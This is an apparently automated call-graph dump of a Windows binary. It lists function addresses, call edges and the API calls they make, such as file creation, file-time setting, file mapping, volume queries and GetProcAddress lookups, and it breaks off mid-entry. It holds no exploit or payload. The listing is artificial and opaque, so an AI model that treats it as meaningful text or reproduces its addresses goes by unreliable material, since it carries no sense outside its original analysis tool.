7290 413141 7289->7290 7291 412ae0 14 API calls 7289->7291 7292 409120 TlsGetValue 7290->7292 7291->7290 7292->7277 7294 4135d2 7293->7294 7296 413574 7293->7296 7294->7261 7295 4135c6 7297 409120 TlsGetValue 7295->7297 7296->7294 7296->7295 7298 411e20 14 API calls 7296->7298 7297->7294 7298->7295 7300 419650 TlsGetValue 7299->7300 7301 412f0e 7300->7301 7302 412f17 7301->7302 7303 412f26 7301->7303 7304 419650 TlsGetValue 7302->7304 7306 419650 TlsGetValue 7303->7306 7305 412f1c 7304->7305 7305->7276 7305->7279 7307 412f36 7306->7307 7308 419650 TlsGetValue 7307->7308 7308->7305 7310 412940 7309->7310 7315 412980 7309->7315 7311 412982 7310->7311 7312 41294d 7310->7312 7313 412957 7311->7313 7314 412a2e 7311->7314 7312->7313 7319 4129f8 7312->7319 7313->7315 7318 4093f0 TlsGetValue 7313->7318 7314->7315 7346 4124e0 7314->7346 7315->7289 7316 412920 18 API calls 7316->7319 7318->7315 7319->7315 7319->7316 7321 412770 7320->7321 7329 412801 7320->7329 7322 41277d 7321->7322 7323 4127bc 7321->7323 7324 412787 7322->7324 7330 41289f 7322->7330 7326 4127d6 7323->7326 7328 4128eb 7323->7328 7323->7329 7325 412790 7324->7325 7333 4127e5 7324->7333 7327 41279d 7325->7327 7335 412806 7325->7335 7331 4127e3 7326->7331 7332 41290c 7326->7332 7336 4127aa 7327->7336 7337 412848 7327->7337 7328->7329 7376 4135e0 7328->7376 7329->7281 7330->7329 7364 412220 7330->7364 7331->7329 7342 410430 TlsGetValue 7331->7342 7338 4093f0 TlsGetValue 7332->7338 7333->7329 7354 410540 7333->7354 7335->7329 7341 4104f0 2 API calls 7335->7341 7336->7332 7344 4127b7 7336->7344 7337->7329 7360 4121f0 7337->7360 7338->7329 7341->7335 7342->7331 7344->7329 7345 412750 18 API calls 7344->7345 7345->7344 7347 412715 7346->7347 7348 412516 7346->7348 7347->7314 7348->7347 7349 412920 18 API calls 7348->7349 7350 4124e0 18 API calls 7348->7350 7351 4093f0 TlsGetValue 7348->7351 7352 417460 18 API calls 7348->7352 7353 417420 14 API calls 7348->7353 7349->7348 7350->7348 7351->7348 7352->7348 7353->7348 7355 41055b 7354->7355 7359 410575 7354->7359 7357 40fd10 TlsGetValue 7355->7357 7355->7359 7356 40fe30 TlsGetValue 7358 4105b2 7356->7358 7357->7359 7358->7333 7359->7356 7361 412206 7360->7361 7362 4121fe 7360->7362 7363 4093f0 TlsGetValue 7361->7363 7362->7337 7363->7362 7365 41249d 7364->7365 7371 412256 7364->7371 7365->7330 7366 412220 18 API calls 7366->7371 7367 4135e0 18 API calls 7367->7371 7368 410540 TlsGetValue 7368->7371 7369 417460 18 API calls 7369->7371 7370 4093f0 TlsGetValue 7370->7371 7371->7365 7371->7366 7371->7367 7371->7368 7371->7369 7371->7370 7372 4104f0 SysFreeString TlsGetValue 7371->7372 7373 410430 TlsGetValue 7371->7373 7374 4121f0 TlsGetValue 7371->7374 7375 412750 18 API calls 7371->7375 7372->7371 7373->7371 7374->7371 7375->7371 7377 4135f5 7376->7377 7378 41360b 7376->7378 7377->7378 7379 4135fb 7377->7379 7382 413560 14 API calls 7378->7382 7380 4133d0 18 API calls 7379->7380 7381 413609 7380->7381 7381->7328 7382->7381 7384 412f60 18 API calls 7383->7384 7385 4133c1 7384->7385 7385->7178 7387 7f471d 7386->7387 7388 7f474b 7387->7388 7389 440a70 33 API calls 7387->7389 7390 413560 14 API calls 7388->7390 7389->7388 7391 7f4768 7390->7391 7391->7178 7393 462877 7392->7393 7394 46288d 7393->7394 7400 462810 7393->7400 7394->7187 7397 412ac9 7396->7397 7398 412ace 7396->7398 7399 412750 18 API calls 7397->7399 7398->7158 7399->7398 7402 46282e 7400->7402 7401 464360 18 API calls 7403 462856 7401->7403 7402->7401 7403->7394 7405 417453 7404->7405 7406 417432 7404->7406 7405->7192 7410 40cf00 7406->7410 7419 4159e0 7410->7419 7412 40cf2a 7423 40ced0 7412->7423 7415 4173c0 7416 4173e4 7415->7416 7417 4173c9 7415->7417 7416->7405 7427 416ef0 7417->7427 7420 415a03 7419->7420 7421 4159f9 7419->7421 7420->7421 7422 409390 TlsGetValue 7420->7422 7421->7412 7422->7421 7424 40cef5 7423->7424 7425 40cee1 7423->7425 7424->7415 7425->7424 7426 409390 TlsGetValue 7425->7426 7426->7424 7428 416fb3 7427->7428 7429 416f19 7427->7429 7428->7416 7435 4169e0 7429->7435 7431 416f57 7439 416a90 7431->7439 7436 4169f9 7435->7436 7437 4169ee 7435->7437 7436->7431 7438 40d960 12 API calls 7437->7438 7438->7436 7440 416aa6 7439->7440 7441 416a9e 7439->7441 7440->7428 7443 416600 7440->7443 7442 40db30 GetCurrentThreadId Sleep TlsGetValue 7441->7442 7442->7440 7444 416390 12 API calls 7443->7444 7446 416642 7444->7446 7445 4166c0 7447 4163b0 GetCurrentThreadId Sleep TlsGetValue 7445->7447 7446->7445 7448 41669f 7446->7448 7449 4166cb 7447->7449 7450 4166e0 GetCurrentThreadId Sleep TlsGetValue 7448->7450 7449->7428 7450->7449 7452 411b70 TlsGetValue 7451->7452 7453 7f80b3 7452->7453 7454 411b70 TlsGetValue 7453->7454 7455 7f80c6 7454->7455 7456 411b70 TlsGetValue 7455->7456 7457 7f80d9 7456->7457 7458 411b70 TlsGetValue 7457->7458 7459 7f80ec 7458->7459 7460 411b70 TlsGetValue 7459->7460 7461 7f80ff 7460->7461 7462 411b70 TlsGetValue 7461->7462 7463 7f8112 7462->7463 7464 411b70 TlsGetValue 7463->7464 7465 7f8125 7464->7465 7466 411d20 14 API calls 7465->7466 7467 7f8139 7466->7467 7597 7f9110 7467->7597 7470 412220 18 API calls 7471 7f8173 7470->7471 7472 40fde0 TlsGetValue 7471->7472 7473 7f8180 7472->7473 7640 7f7400 7473->7640 7476 7f823e 7671 442eb0 7476->7671 7478 411d20 14 API calls 7480 7f81c7 7478->7480 7650 45e650 7480->7650 7482 4104b0 TlsGetValue 7484 7f8278 7482->7484 7483 7f81dd 7485 412220 18 API calls 7483->7485 7486 7f82c1 7484->7486 7487 7f8281 7484->7487 7488 7f8210 7485->7488 7741 437410 7486->7741 7716 57a950 7487->7716 7654 7f5410 7488->7654 7495 57a950 33 API calls 7499 7f82fa 7495->7499 7496 4104b0 TlsGetValue 7497 7f82b2 7496->7497 7500 40fde0 TlsGetValue 7497->7500 7498 411d20 14 API calls 7498->7476 7501 4104b0 TlsGetValue 7499->7501 7502 7f82bf 7500->7502 7503 7f830d 7501->7503 7745 437260 7502->7745 7504 40fde0 TlsGetValue 7503->7504 7504->7502 7507 7f8359 7509 7f883d 7507->7509 7510 7f8396 7507->7510 7508 437260 TlsGetValue 7511 7f8350 7508->7511 7815 7f8a80 7509->7815 7512 511410 57 API calls 7510->7512 7749 579290 7511->7749 7515 7f83b0 7512->7515 7516 410430 TlsGetValue 7515->7516 7518 7f83cf 7516->7518 7517 40fec0 TlsGetValue 7519 7f885a 7517->7519 7520 7f8524 7518->7520 7521 7f83e2 7518->7521 7523 40fec0 TlsGetValue 7519->7523 7522 411d20 14 API calls 7520->7522 7524 411d20 14 API calls 7521->7524 7525 7f854a 7522->7525 7526 7f886c 7523->7526 7527 7f8408 7524->7527 7528 45e650 33 API calls 7525->7528 7529 411d20 14 API calls 7526->7529 7530 45e650 33 API calls 7527->7530 7531 7f8560 7528->7531 7532 7f887f 7529->7532 7533 7f841e 7530->7533 7535 412220 18 API calls 7531->7535 7536 411e20 14 API calls 7532->7536 7534 412220 18 API calls 7533->7534 7537 7f8451 7534->7537 7538 7f8593 7535->7538 7539 7f8899 7536->7539 7540 411d20 14 API calls 7537->7540 7541 510740 50 API calls 7538->7541 7542 411e20 14 API calls 7539->7542 7543 7f8475 7540->7543 7544 7f85ad 7541->7544 7545 7f88b3 7542->7545 7548 411d20 14 API calls 7543->7548 7552 7f851f 7543->7552 7546 411d20 14 API calls 7544->7546 7547 40fec0 TlsGetValue 7545->7547 7546->7552 7549 7f88c5 7547->7549 7550 7f84a8 7548->7550 7551 411d20 14 API calls 7549->7551 7553 45e650 33 API calls 7550->7553 7554 7f88d8 7551->7554 7555 40fde0 TlsGetValue 7552->7555 7556 7f84be 7553->7556 7554->6962 7557 7f862b 7555->7557 7558 412220 18 API calls 7556->7558 7769 436880 7557->7769 7560 7f84f1 7558->7560 7758 510740 7560->7758 7561 7f8639 7563 7f87ff 7561->7563 7778 7f4670 7561->7778 7566 411d20 14 API calls 7563->7566 7574 7f8817 7566->7574 7567 411d20 14 API calls 7567->7552 7569 7f86ba 7570 411d20 14 API calls 7569->7570 7572 7f86dd 7570->7572 7575 45e650 33 API calls 7572->7575 7574->7517 7577 7f86f0 7575->7577 7579 412220 18 API calls 7577->7579 7581 7f8720 7579->7581 7583 411d20 14 API calls 7581->7583 7585 7f8749 7583->7585 7584 579ce0 80 API calls 7584->7569 7585->7563 7586 411d20 14 API calls 7585->7586 7587 7f8776 7586->7587 7588 45e650 33 API calls 7587->7588 7589 7f8789 7588->7589 7590 412220 18 API calls 7589->7590 7591 7f87b9 7590->7591 7808 579f50 7591->7808 7596 411d20 14 API calls 7596->7563 7598 411b70 TlsGetValue 7597->7598 7599 7f9158 7598->7599 7600 411b70 TlsGetValue 7599->7600 7601 7f916b 7600->7601 7602 411b70 TlsGetValue 7601->7602 7603 7f917b 7602->7603 7604 7f91bb 7603->7604 7605 440a70 33 API calls 7603->7605 7606 7f91f7 7604->7606 7607 440a70 33 API calls 7604->7607 7605->7604 7608 413560 14 API calls 7606->7608 7607->7606 7609 7f9222 7608->7609 7610 411d20 14 API calls 7609->7610 7611 7f9288 7610->7611 7612 45e650 33 API calls 7611->7612 7613 7f929b 7612->7613 7614 412220 18 API calls 7613->7614 7615 7f92cb 7614->7615 7616 411d20 14 API calls 7615->7616 7617 7f9304 7616->7617 7618 440a70 33 API calls 7617->7618 7619 7f9343 7617->7619 7618->7619 7620 413390 18 API calls 7619->7620 7622 7f94cb 7620->7622 7621 7f9525 7624 411d20 14 API calls 7621->7624 7622->7621 7623 413390 18 API calls 7622->7623 7623->7621 7625 7f956c 7624->7625 7626 45e650 33 API calls 7625->7626 7627 7f957f 7626->7627 7628 412220 18 API calls 7627->7628 7629 7f95ac 7628->7629 7818 7fb0f0 7629->7818 7632 411d20 14 API calls 7633 7f9603 7632->7633 7634 7f9633 7633->7634 7635 40ced0 TlsGetValue 7633->7635 7636 411d20 14 API calls 7634->7636 7635->7634 7637 7f965d 7636->7637 7638 411e20 14 API calls 7637->7638 7639 7f8155 7638->7639 7639->7470 7643 7f7443 7640->7643 7649 7f74f9 7640->7649 7641 40fde0 TlsGetValue 7642 7f7519 7641->7642 7642->7476 7642->7478 7643->7649 7824 44b3d0 7643->7824 7645 7f74c7 7828 44b130 7645->7828 7647 7f74ec 7648 410430 TlsGetValue 7647->7648 7648->7649 7649->7641 7651 45e65d 7650->7651 7652 45e67b 7651->7652 7653 440a70 33 API calls 7651->7653 7652->7483 7653->7652 7655 7f543f 7654->7655 7656 7f545b 7655->7656 7657 7f544a 7655->7657 7658 44afb0 35 API calls 7656->7658 7866 44afb0 7657->7866 7660 7f5455 7658->7660 7661 44b130 50 API calls 7660->7661 7662 7f54a8 7661->7662 7663 410430 TlsGetValue 7662->7663 7664 7f54b5 7663->7664 7665 40fde0 TlsGetValue 7664->7665 7666 7f54bf 7665->7666 7667 40fde0 TlsGetValue 7666->7667 7668 7f54d3 7667->7668 7669 413560 14 API calls 7668->7669 7670 7f54e6 7669->7670 7670->7498 7672 442f1a 7671->7672 7673 442f42 7672->7673 7674 442f57 7672->7674 7675 410430 TlsGetValue 7673->7675 7676 443014 7674->7676 7677 442f68 7674->7677 7715 442f52 7675->7715 7678 4104b0 TlsGetValue 7676->7678 7870 434b10 7677->7870 7681 443024 7678->7681 7680 40fec0 TlsGetValue 7683 443761 7680->7683 7684 4104b0 TlsGetValue 7681->7684 7682 442f78 7875 434b60 7682->7875 7686 413560 14 API calls 7683->7686 7690 442fe9 7684->7690 7687 443774 7686->7687 7688 40fec0 TlsGetValue 7687->7688 7689 443786 7688->7689 7689->7482 7695 443059 7690->7695 7702 44313e 7690->7702 7691 442f99 7692 442fd6 7691->7692 7693 442feb 7691->7693 7694 4104b0 TlsGetValue 7692->7694 7696 434b10 TlsGetValue 7693->7696 7694->7690 7697 40fde0 TlsGetValue 7695->7697 7696->7690 7710 443062 7697->7710 7698 4431cb 7699 4431d4 7698->7699 7700 443741 7698->7700 7703 4431f5 7699->7703 7704 44332d 7699->7704 7701 410430 TlsGetValue 7700->7701 7701->7715 7702->7698 7707 413390 18 API calls 7702->7707 7705 4113d0 TlsGetValue 7703->7705 7706 4113d0 TlsGetValue 7704->7706 7705->7715 7706->7715 7707->7702 7708 4114b0 TlsGetValue 7708->7710 7710->7708 7711 4430be 7710->7711 7710->7715 7881 411190 7710->7881 7712 448740 TlsGetValue 7711->7712 7713 4430dd 7712->7713 7714 4114b0 TlsGetValue 7713->7714 7714->7715 7715->7680 7717 57a98c 7716->7717 7718 57a97a 7716->7718 7720 57a995 7717->7720 7726 57a9a7 7717->7726 7719 410430 TlsGetValue 7718->7719 7722 57a987 7719->7722 7723 410430 TlsGetValue 7720->7723 7721 57aa00 7887 57b7e0 7721->7887 7727 40fde0 TlsGetValue 7722->7727 7723->7722 7725 57aa11 7728 57aa22 7725->7728 7734 57aa31 7725->7734 7726->7721 7730 440a70 33 API calls 7726->7730 7732 57a9d4 7726->7732 7729 57aaa5 7727->7729 7731 410430 TlsGetValue 7728->7731 7729->7496 7730->7732 7731->7722 7732->7721 7733 440a70 33 API calls 7732->7733 7733->7721 7735 57aa57 7734->7735 7736 57aa8a 7734->7736 7738 411190 TlsGetValue 7735->7738 7737 411580 TlsGetValue 7736->7737 7737->7722 7739 57aa68 7738->7739 7740 4116b0 TlsGetValue 7739->7740 7740->7722 7742 43742e 7741->7742 7894 448700 7742->7894 7746 43727f 7745->7746 7747 448740 TlsGetValue 7746->7747 7748 4372cd 7747->7748 7748->7507 7748->7508 7898 57ae50 SetLastError 7749->7898 7756 40fde0 TlsGetValue 7757 5792ce 7756->7757 7757->7507 7759 51076f 7758->7759 7760 413390 18 API calls 7759->7760 7762 5107d3 7760->7762 7761 51082d 7763 413560 14 API calls 7761->7763 7762->7761 8004 50f240 7762->8004 8007 510620 7762->8007 7764 51083e 7763->7764 7766 413560 14 API calls 7764->7766 7767 51084f 7766->7767 7767->7567 7770 411140 7769->7770 7771 436899 GetFileAttributesW 7770->7771 7772 43692d GetLastError 7771->7772 7773 4368ad 7771->7773 7777 4368bc 7772->7777 7774 4368d2 CreateFileW 7773->7774 7773->7777 7775 436915 GetLastError 7774->7775 7776 436909 CloseHandle 7774->7776 7775->7777 7776->7777 7777->7561 7779 7f46ad 7778->7779 7781 7f46e5 7779->7781 8022 43c060 7779->8022 7781->7569 7782 579f60 7781->7782 8033 57a260 7782->8033 7785 579ce0 7786 579d34 7785->7786 7789 579d3f 7785->7789 7787 4090f0 TlsGetValue 7786->7787 7787->7789 7788 579dd2 SetLastError 8093 436cd0 7788->8093 7790 4090f0 TlsGetValue 7789->7790 7793 579d77 7789->7793 7790->7793 7791 4090f0 TlsGetValue 7794 579daf 7791->7794 7793->7788 7793->7791 7794->7788 7795 579de7 7796 579e11 CreateFileW 7795->7796 7797 579e8f CloseHandle SetLastError 7796->7797 7798 579e4c SetFileTime 7796->7798 7799 409120 TlsGetValue 7797->7799 7798->7797 7800 579ea9 7799->7800 7801 409120 TlsGetValue 7800->7801 7802 579eb2 7801->7802 7803 409120 TlsGetValue 7802->7803 7804 579ebb 7803->7804 7805 579f70 7804->7805 7806 57a260 47 API calls 7805->7806 7807 579f7b 7806->7807 7807->7584 7809 57a260 47 API calls 7808->7809 7810 579f5b 7809->7810 7811 57a040 7810->7811 7812 57a058 7811->7812 8300 436de0 7812->8300 7816 411d20 14 API calls 7815->7816 7817 7f8aa4 7816->7817 7817->7574 7819 7fb10b 7818->7819 7820 440a70 33 API calls 7819->7820 7822 7fb132 7819->7822 7820->7822 7821 412220 18 API calls 7823 7f95c1 7821->7823 7822->7821 7823->7632 7825 44b3ec 7824->7825 7826 44b3de 7824->7826 7825->7645 7844 44bb90 7826->7844 7829 44b155 7828->7829 7830 44b17c 7829->7830 7831 440a70 33 API calls 7829->7831 7832 440c20 50 API calls 7830->7832 7834 44b1b0 7830->7834 7831->7830 7832->7834 7833 44b1ef 7836 44b247 7833->7836 7837 440c20 50 API calls 7833->7837 7834->7833 7835 440c20 50 API calls 7834->7835 7835->7833 7856 44a6d0 7836->7856 7837->7836 7839 44b265 7840 44b28b 7839->7840 7842 440a70 33 API calls 7839->7842 7841 4113d0 TlsGetValue 7840->7841 7843 44b29e 7841->7843 7842->7840 7843->7647 7846 44bbaa 7844->7846 7848 44b5e0 7846->7848 7847 44bbde 7847->7825 7852 44b608 7848->7852 7849 44b624 GetACP 7851 44b63f GetCPInfo 7849->7851 7850 44b632 7850->7851 7853 44b66d 7851->7853 7854 44b682 7851->7854 7852->7849 7852->7850 7855 440a70 33 API calls 7853->7855 7854->7847 7855->7854 7857 44a6de 7856->7857 7864 44a6f8 7856->7864 7860 440a70 33 API calls 7857->7860 7857->7864 7858 44a72e 7861 440c20 50 API calls 7858->7861 7862 44a764 7858->7862 7859 440c20 50 API calls 7859->7858 7860->7864 7861->7862 7863 44a7b3 7862->7863 7865 440c20 50 API calls 7862->7865 7863->7839 7864->7858 7864->7859 7865->7863 7867 44afc0 7866->7867 7868 44afda 7866->7868 7867->7868 7869 44bb90 35 API calls 7867->7869 7868->7660 7869->7868 7871 410430 TlsGetValue 7870->7871 7872 434b21 7871->7872 7874 434b2f 7872->7874 7884 4106f0 7872->7884 7874->7682 7876 434b73 7875->7876 7877 4100a0 TlsGetValue 7876->7877 7878 434b8c 7877->7878 7879 434ba2 7878->7879 7880 434b98 CharLowerBuffW 7878->7880 7879->7691 7880->7879 7882 4100a0 TlsGetValue 7881->7882 7883 4111aa 7882->7883 7883->7710 7885 410610 TlsGetValue 7884->7885 7886 4106f9 7885->7886 7886->7874 7890 57b0d0 7887->7890 7889 57b7eb 7889->7725 7891 57b0e8 7890->7891 7893 57b10f 7890->7893 7892 440a70 33 API calls 7891->7892 7891->7893 7892->7893 7893->7889 7895 44871c 7894->7895 7896 4117a0 TlsGetValue 7895->7896 7897 437442 7896->7897 7897->7495 7899 4374d0 2 API calls 7898->7899 7900 57ae7d GetLastError 7899->7900 7901 57ae86 7900->7901 7902 57aeab 7900->7902 7901->7902 7904 43ea00 3 API calls 7901->7904 7903 40fde0 TlsGetValue 7902->7903 7905 5792b2 7903->7905 7906 57ae99 7904->7906 7908 579160 7905->7908 7937 440800 7906->7937 7941 579bc0 7908->7941 7910 579180 7916 5791bc 7910->7916 7960 57aef0 7910->7960 7912 40fde0 TlsGetValue 7913 5791ce 7912->7913 7917 436a90 7913->7917 7914 57919a 7915 440a70 33 API calls 7914->7915 7914->7916 7915->7916 7916->7912 7918 436abd 7917->7918 7919 436adf 7918->7919 7921 440a70 33 API calls 7918->7921 7999 442b60 7919->7999 7921->7919 7923 4104b0 TlsGetValue 7924 436b08 7923->7924 7925 436960 4 API calls 7924->7925 7927 436b13 7925->7927 7926 40fec0 TlsGetValue 7928 436b9f 7926->7928 7930 437200 TlsGetValue 7927->7930 7932 436b2a 7927->7932 7936 436b51 7927->7936 7929 40fde0 TlsGetValue 7928->7929 7931 436ba8 7929->7931 7930->7932 7931->7756 7933 437200 TlsGetValue 7932->7933 7932->7936 7934 436b6c 7933->7934 7935 436a90 37 API calls 7934->7935 7935->7936 7936->7926 7938 44081e 7937->7938 7939 410430 TlsGetValue 7938->7939 7940 440842 7939->7940 7940->7902 7975 57a3e0 7941->7975 7943 579be7 7979 57b460 7943->7979 7946 579c09 7986 434ce0 7946->7986 7947 440a70 33 API calls 7947->7946 7950 440a70 33 API calls 7951 579c3a 7950->7951 7952 440a70 33 API calls 7951->7952 7953 579c66 7951->7953 7952->7953 7954 579c9b 7953->7954 7996 579a10 7953->7996 7955 40fde0 TlsGetValue 7954->7955 7957 579cad 7955->7957 7957->7910 7959 440a70 33 API calls 7959->7954 7961 411190 TlsGetValue 7960->7961 7962 57af35 7961->7962 7963 411190 TlsGetValue 7962->7963 7964 57af46 7963->7964 7965 411580 TlsGetValue 7964->7965 7966 57af57 7965->7966 7967 4117a0 TlsGetValue 7966->7967 7968 57b068 7967->7968 7969 57b08a 7968->7969 7970 411190 TlsGetValue 7968->7970 7971 40fec0 TlsGetValue 7969->7971 7973 57b07d 7970->7973 7972 57b09a 7971->7972 7972->7914 7974 4114b0 TlsGetValue 7973->7974 7974->7969 7976 57a3ee 7975->7976 7977 440a70 33 API calls 7976->7977 7978 57a414 7976->7978 7977->7978 7978->7943 7980 434ce0 TlsGetValue 7979->7980 7983 57b490 7980->7983 7981 40fec0 TlsGetValue 7982 579bf0 7981->7982 7982->7946 7982->7947 7984 411190 TlsGetValue 7983->7984 7985 57b4c3 7983->7985 7984->7985 7985->7981 7987 434cf9 7986->7987 7991 434d38 7987->7991 7993 434d29 7987->7993 7988 434d55 7989 40fde0 TlsGetValue 7988->7989 7992 434d36 7989->7992 7990 434d5f 7994 448740 TlsGetValue 7990->7994 7991->7988 7991->7990 7992->7950 7992->7951 7995 410430 TlsGetValue 7993->7995 7994->7992 7995->7992 7997 436960 4 API calls 7996->7997 7998 579a19 7997->7998 7998->7954 7998->7959 8000 410430 TlsGetValue 7999->8000 8001 442b70 8000->8001 8002 436afb 8001->8002 8003 4113d0 TlsGetValue 8001->8003 8002->7923 8003->8002 8010 50f260 8004->8010 8016 510640 8007->8016 8011 50f289 8010->8011 8013 440a70 33 API calls 8011->8013 8014 50f2a9 8011->8014 8012 50f251 8012->7762 8013->8014 8014->8012 8015 440a70 33 API calls 8014->8015 8015->8014 8017 510669 8016->8017 8019 440a70 33 API calls 8017->8019 8020 510689 8017->8020 8018 510631 8018->7762 8019->8020 8020->8018 8021 440a70 33 API calls 8020->8021 8021->8020 8023 43c0c1 8022->8023 8024 43c070 8022->8024 8023->7781 8024->8023 8026 43bf60 8024->8026 8029 43bed0 8026->8029 8030 43bee3 8029->8030 8031 434200 50 API calls 8030->8031 8032 43bf19 8030->8032 8031->8032 8032->8023 8034 57a3e0 33 API calls 8033->8034 8035 57a297 8034->8035 8036 57b460 TlsGetValue 8035->8036 8037 57a2a0 8036->8037 8038 57a2b9 8037->8038 8039 440a70 33 API calls 8037->8039 8040 434ce0 TlsGetValue 8038->8040 8039->8038 8041 57a2ce 8040->8041 8042 440a70 33 API calls 8041->8042 8043 57a2ea 8041->8043 8042->8043 8044 57a316 8043->8044 8045 440a70 33 API calls 8043->8045 8046 57ae50 6 API calls 8044->8046 8045->8044 8047 57a32b 8046->8047 8060 57aad0 8047->8060 8050 436960 4 API calls 8051 57a346 8050->8051 8052 57a35f 8051->8052 8053 440a70 33 API calls 8051->8053 8054 57a394 8052->8054 8090 57a070 8052->8090 8053->8052 8056 40fec0 TlsGetValue 8054->8056 8058 579f6b 8056->8058 8058->7785 8059 440a70 33 API calls 8059->8054 8061 57ab26 8060->8061 8062 40fde0 TlsGetValue 8061->8062 8063 57ab33 8062->8063 8064 434ce0 TlsGetValue 8063->8064 8065 57ab43 8064->8065 8066 4104b0 TlsGetValue 8065->8066 8067 57ab53 8066->8067 8068 411190 TlsGetValue 8067->8068 8069 57ab64 8068->8069 8070 411190 TlsGetValue 8069->8070 8071 57ab75 8070->8071 8072 411580 TlsGetValue 8071->8072 8073 57ab86 8072->8073 8074 411190 TlsGetValue 8073->8074 8082 57abe6 8073->8082 8074->8082 8075 4117a0 TlsGetValue 8076 57ad8e 8075->8076 8077 410430 TlsGetValue 8076->8077 8078 57ad9e 8077->8078 8079 40fde0 TlsGetValue 8078->8079 8080 57ada8 8079->8080 8081 40fec0 TlsGetValue 8080->8081 8083 57adb8 8081->8083 8082->8075 8084 40fde0 TlsGetValue 8083->8084 8085 57adc1 8084->8085 8086 40fde0 TlsGetValue 8085->8086 8087 57adca 8086->8087 8088 40fde0 TlsGetValue 8087->8088 8089 57a338 8088->8089 8089->8050 8091 436880 5 API calls 8090->8091 8092 57a079 8091->8092 8092->8054 8092->8059 8094 411140 8093->8094 8095 436d01 GetFileAttributesW 8094->8095 8096 436d21 8095->8096 8097 436d84 8095->8097 8111 434060 8096->8111 8098 40fec0 TlsGetValue 8097->8098 8100 436d94 8098->8100 8101 40fde0 TlsGetValue 8100->8101 8102 436d9d 8101->8102 8102->7795 8103 436d34 8103->8097 8104 436d70 8103->8104 8105 437200 TlsGetValue 8103->8105 8106 436d79 GetFileAttributesW 8104->8106 8107 436d52 8105->8107 8106->8097 8124 442b00 8107->8124 8110 411580 TlsGetValue 8110->8104 8112 43408b 8111->8112 8113 434175 8112->8113 8114 436880 5 API calls 8112->8114 8113->8103 8115 4340a1 8114->8115 8115->8113 8129 436470 8115->8129 8117 4340b5 8117->8113 8118 4340ca GetFileAttributesW 8117->8118 8118->8113 8119 4340df 8118->8119 8119->8113 8120 434115 CreateFileW 8119->8120 8120->8113 8121 434150 8120->8121 8160 433d50 8121->8160 8125 410430 TlsGetValue 8124->8125 8126 442b10 8125->8126 8127 436d5f 8126->8127 8128 4114b0 TlsGetValue 8126->8128 8127->8110 8128->8127 8130 413390 18 API calls 8129->8130 8131 4364ca 8130->8131 8132 413390 18 API calls 8131->8132 8133 4364e8 8132->8133 8134 436960 4 API calls 8133->8134 8135 4364fe 8134->8135 8136 43650d 8135->8136 8137 436880 5 API calls 8135->8137 8140 436624 8136->8140 8194 4372f0 8136->8194 8137->8136 8142 417be0 33 API calls 8140->8142 8141 442b00 TlsGetValue 8143 436532 8141->8143 8144 436634 8142->8144 8146 43653e GetVolumeInformationW 8143->8146 8145 440800 TlsGetValue 8144->8145 8151 4365e3 8145->8151 8147 43661f 8146->8147 8150 436589 GetDriveTypeW 8146->8150 8204 443d70 GetLastError 8147->8204 8150->8151 8152 40fec0 TlsGetValue 8151->8152 8153 43665e 8152->8153 8154 413560 14 API calls 8153->8154 8155 43666e 8154->8155 8156 413560 14 API calls 8155->8156 8157 43667e 8156->8157 8158 40fde0 TlsGetValue 8157->8158 8159 43668a 8158->8159 8159->8117 8161 40fde0 TlsGetValue 8160->8161 8166 433dbf 8161->8166 8162 433e67 8163 433e7d CreateFileMappingW 8162->8163 8164 433f6a 8162->8164 8163->8164 8165 433ebe MapViewOfFile 8163->8165 8167 433e5b 8164->8167 8232 433c00 8164->8232 8168 433ef1 GetCurrentProcess 8165->8168 8169 433f5d CloseHandle 8165->8169 8166->8162 8180 433e27 8166->8180 8172 40fec0 TlsGetValue 8167->8172 8229 4234a0 8168->8229 8169->8164 8175 433fe0 CloseHandle 8172->8175 8174 433f11 8177 433f50 UnmapViewOfFile 8174->8177 8179 411240 TlsGetValue 8174->8179 8175->8113 8176 410430 TlsGetValue 8178 433f96 8176->8178 8177->8169 8178->8167 8183 433aa0 TlsGetValue 8178->8183 8181 433f29 8179->8181 8182 411240 TlsGetValue 8180->8182 8184 433aa0 TlsGetValue 8181->8184 8185 433e3b 8182->8185 8187 433fb9 8183->8187 8188 433f39 8184->8188 8217 433aa0 8185->8217 8191 410430 TlsGetValue 8187->8191 8189 410430 TlsGetValue 8188->8189 8192 433f49 8189->8192 8191->8167 8192->8177 8193 410430 TlsGetValue 8193->8167 8195 437309 8194->8195 8196 437324 8195->8196 8201 437344 8195->8201 8199 4117a0 TlsGetValue 8196->8199 8197 4373f1 8198 40fde0 TlsGetValue 8197->8198 8200 436522 8198->8200 8199->8200 8200->8141 8201->8197 8202 437383 8201->8202 8203 4117a0 TlsGetValue 8202->8203 8203->8200 8207 443d90 8204->8207 8208 443e03 8207->8208 8209 443daf 8207->8209 8211 440a70 33 API calls 8208->8211 8210 43ea00 TlsGetValue FormatMessageW LocalFree 8209->8210 8212 443dc8 8210->8212 8213 443e01 8211->8213 8214 440c20 50 API calls 8212->8214 8215 40fde0 TlsGetValue 8213->8215 8214->8213 8216 443d82 8215->8216 8216->8140 8222 433ae1 8217->8222 8218 433b94 8219 40fec0 TlsGetValue 8218->8219 8220 433bc4 8219->8220 8220->8193 8221 411240 TlsGetValue 8221->8222 8222->8218 8222->8221 8223 433b41 8222->8223 8224 4111e0 TlsGetValue 8223->8224 8225 433b69 8224->8225 8226 4117a0 TlsGetValue 8225->8226 8227 433b83 8226->8227 8228 411580 TlsGetValue 8227->8228 8228->8218 8243 422f10 8229->8243 8231 4234ba 8231->8174 8233 40fde0 TlsGetValue 8232->8233 8235 433c24 8233->8235 8234 433ce7 8234->8176 8237 433c49 8235->8237 8291 4208c0 8235->8291 8237->8234 8238 4090f0 TlsGetValue 8237->8238 8240 433c98 8238->8240 8239 433cdd 8242 409120 TlsGetValue 8239->8242 8240->8239 8241 4111e0 TlsGetValue 8240->8241 8241->8239 8242->8234 8244 422f3f 8243->8244 8245 422f22 8243->8245 8244->8231 8245->8244 8246 4208c0 TlsGetValue GetProcAddress 8245->8246 8247 422f59 8246->8247 8248 4208c0 TlsGetValue GetProcAddress 8247->8248 8249 422f73 8248->8249 8250 4208c0 TlsGetValue GetProcAddress 8249->8250 8251 422f8d 8250->8251 8252 4208c0 TlsGetValue GetProcAddress 8251->8252 8253 422fa7 8252->8253 8254 4208c0 TlsGetValue GetProcAddress 8253->8254 8255 422fc1 8254->8255 8256 4208c0 TlsGetValue GetProcAddress 8255->8256 8257 422fdb 8256->8257 8258 4208c0 TlsGetValue GetProcAddress 8257->8258 8259 422ff5 8258->8259 8260 4208c0 TlsGetValue GetProcAddress 8259->8260 8261 42300f 8260->8261 8262 4208c0 TlsGetValue 